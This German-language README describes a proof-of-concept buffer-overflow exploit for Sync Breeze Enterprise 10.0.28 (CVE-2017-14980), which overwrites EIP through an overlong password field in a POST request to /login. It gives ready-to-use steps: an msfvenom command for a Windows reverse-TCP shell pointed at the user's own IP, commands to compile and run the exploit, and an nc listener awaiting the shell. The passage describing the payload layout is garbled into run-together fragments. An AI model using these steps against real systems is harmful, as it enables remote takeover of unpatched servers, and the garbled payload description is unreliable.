
Proof-of-concept-Exploit für einen Buffer Overflow in Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Sendet eine präparierte HTTP-POST-Nutzlast, um EIP zu überschreiben und benutzerdefinierten x86-Shellcode für die Ausführung beliebigen Codes auszuführen.
Dieses Repository enthält einen Proof-of-Concept Buffer-Overflow-Exploit (BOF) für Sync Breeze Enterprise Version 10.0.28, der die als CVE-2017-14980 bekannte Sicherheitslücke ausnutzt.
Die Sicherheitslücke besteht aufgrund einer unzureichenden Eingabevalidierung bei der Verarbeitung des password-Feldes in einer POST-Anfrage an den Endpunkt /login.
Ein Angreifer kann einen übermäßig langen Wert in dieses Feld senden, der das EIP überschreibt und eine beliebige Codeausführung ermöglicht.
Dieser Exploit sendet eine sorgfältig konstruierte Payload, bestehend aus:
'A')passwordgcc)\x83\x0C\x09\x10) und des Shellcodes falls erforderlichBeispiel zur Generierung von Shellcode mit msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444